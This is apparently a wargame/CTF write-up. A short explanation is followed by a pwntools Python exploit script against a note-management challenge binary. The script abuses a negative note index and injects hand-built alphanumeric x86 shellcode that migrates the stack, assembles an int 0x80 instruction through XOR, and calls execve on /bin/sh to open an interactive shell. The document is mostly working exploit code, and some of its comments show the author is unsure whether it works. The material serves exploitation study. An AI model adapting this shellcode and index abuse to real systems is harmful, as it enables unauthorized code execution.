This challenge is from a wargame ( I can’t name it though). It involved using alphanumeric shellcode and somehow placing the 0xcd80
(int 0x80) next to our shellcode. Since 0xcd80 can only be obtained using some xor operations, we can only push this on the stack.
There was no way to mov this value from the stack to the heap, where our shellcode is, so only option left was to migrate stack to
heap and then push this value and a NOP sled from the other end of our available space. So, this means that our available space
decreases by twice the derivative.
It is mandatory that ecx and edx be set to 0.
#!/usr/bin/python
from pwn import *
p = process("./chall")
raw_input()
def make_note(idx,name):
p.recvuntil("choice :")
p.sendline("1")
p.recvuntil("Index :")
p.sendline(str(idx))
p.recvuntil("Name :")
p.sendline(name)
log.success("Created Note #" + str(idx))
def delete_note(idx):
p.recvuntil("choice :")
p.sendline("3")
p.recvuntil("Index :")
p.sendline(str(idx))
# Do some xor operations to get cd and 80. push on stack.
# push esp
# migrate stack to heap. Then push cd80. Then nops.
# int 0x80 there.
# eax contains heap address
shellcode = asm("push ecx")
shellcode += asm("push ecx")
shellcode += asm("push ecx")
shellcode += asm("push 0x68732f2f")
shellcode += asm("push 0x6e69622f")
shellcode += asm("push esp")
shellcode += asm("pop ebx")
shellcode += asm("pop edi")
shellcode += asm("pop edi")
shellcode += asm("pop edi")
shellcode += asm("pop eax")
shellcode += asm("pop edi")
# ebx contains pointer to index_value.
# edx now contains actual -19 value
# Stack Migration. Also push ret.
shellcode += asm("pop esi")
# esi contains return address.
# Get to next note.
shellcode += asm("push 0x5e")
shellcode += asm("pop edi")
shellcode += asm("xor [esp],edi")
shellcode += asm("pop esp")
#shellcode += asm("push esi")
# push opcodes for int 0x80
# inc esp strategy
shellcode += asm("push 0x7e")
shellcode += asm("pop edi")
shellcode += asm("inc edi")
shellcode += asm("inc edi")
# stack pointing to 0x80
shellcode += asm("push 0x4d")
shellcode += asm("xor [esp],edi")
shellcode += asm("inc esp")
shellcode += asm("inc esp")
shellcode += asm("inc esp")
shellcode += asm("push di")
shellcode += asm("dec esp")
# Now start nopping the whole area. (for loop)
for i in range(0,2):
shellcode += asm("push 0x47474747")
# hopefully, we have int 0x80 there.
# eax = 0; ebx contains pointer to /bin/sh
# Restore stack back, execute ret (somehow) and then attack phase 2.
# 0x000000cd 0xffffff80 memory layout to achieve.
shellcode += asm("inc edi")
shellcode += asm("inc eax")
shellcode += asm("inc eax")
shellcode += asm("inc eax")
shellcode += asm("inc eax")
shellcode += asm("inc eax")
shellcode += asm("inc eax")
shellcode += asm("inc eax")
shellcode += asm("inc eax")
shellcode += asm("inc eax")
shellcode += asm("inc eax")
shellcode += asm("inc eax")
print "Shellcode length: " + str(len(shellcode))
print shellcode
make_note(-19,shellcode)
raw_input()
delete_note("-19")
p.interactive()